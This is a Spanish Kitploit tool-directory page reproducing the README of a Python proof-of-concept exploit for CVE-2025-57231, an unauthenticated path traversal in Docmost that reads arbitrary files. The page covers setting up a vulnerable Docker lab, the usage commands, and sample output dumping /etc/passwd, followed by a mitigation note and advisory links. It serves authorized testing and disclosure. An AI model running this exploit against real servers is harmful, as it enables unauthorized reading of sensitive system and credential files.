Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-57231 — PoC de exploit en Python para CVE-2025-57231, un path traversal no autenticado en Docmost < 0.22.0 que lee archivos arbitrarios a través del endpoint de avatar. | Kitploit
Herramientas/GitHubGitHub/anirbala98/cve-2025-57231
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubanirbala98/cve-2025-57231

CVE-2025-57231

PoC de exploit en Python para CVE-2025-57231, un path traversal no autenticado en Docmost < 0.22.0 que lee archivos arbitrarios a través del endpoint de avatar.

Ver Repositorio
1hace 4h 20mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-57231 - Docmost < 0.22.0 - Lectura arbitraria de archivos

Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE-2025-57231.

Descargo de responsabilidad

Este proyecto se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas. No lo utilice contra sistemas que no sean de su propiedad o para los que no tenga permiso para probar.

Descripción general

Una vulnerabilidad de directory traversal en Docmost permite la lectura arbitraria de archivos desde la versión 0.2.1 hasta la 0.21.0. El endpoint /api/attachments/img/avatar de la aplicación no valida correctamente las rutas de archivo y es accesible públicamente sin ningún tipo de autenticación. Esto permite a atacantes no autenticados recuperar el contenido arbitrario de archivos del objetivo sondeando el endpoint /avatar con secuencias %2F.

Versión afectada

Todas las versiones de Docmost desde la 0.2.1 hasta la 0.21.0 están afectadas.

Requisitos

  • Python 3.13.14
  • Requests 2.32.5

Configuración del entorno vulnerable

Requisitos previos: Docker y Docker compose instalados

  1. Crear un directorio home y descargar el archivo docker-compose
root@kitploit:~
mkdir docmost
cd docmost
curl -O https://raw.githubusercontent.com/docmost/docmost/main/docker-compose.yml
  1. Editar el archivo docker-compose.yml
root@kitploit:~
# Generate a long random secret key
openssl rand -hex 32

# Open the docker-compose.yml file and make the following changes:
# 1. Replace `image: docmost/docmost:latest` with `image: docmost/docmost:0.21.0`
# 2. Replace `APP_SECRET` with the random secret key generated above 
  1. Iniciar el contenedor
root@kitploit:~
sudo docker-compose up -d
  1. Introducir los detalles del Workspace

Navegue a http://localhost:3000/ e introduzca datos ficticios para el nombre del workspace, nombre, correo electrónico y contraseña

Instalación del exploit

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2025-57231.git
cd CVE-2025-57231/
pip install -r requirements.txt

Uso

root@kitploit:~
python exploit.py <base_url> -f <file location>
python exploit.py http://localhost:3000/ -f /etc/passwd

Ejemplo

root@kitploit:~
└─$ python exploit.py http://localhost:3000/ -f /etc/passwd
[*] Attempting to read arbitrary file

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh

Mitigación

Actualice el plugin a la versión 0.22.0.

Referencias

  • https://github.com/advisories/GHSA-59m3-fj8c-996g
  • https://nvd.nist.gov/vuln/detail/CVE-2025-57231
  • https://www.artresilia.com/docmost-v0-21-0-cve-2025-57231-unauthenticated-file-path-traversal
Descargar herramienta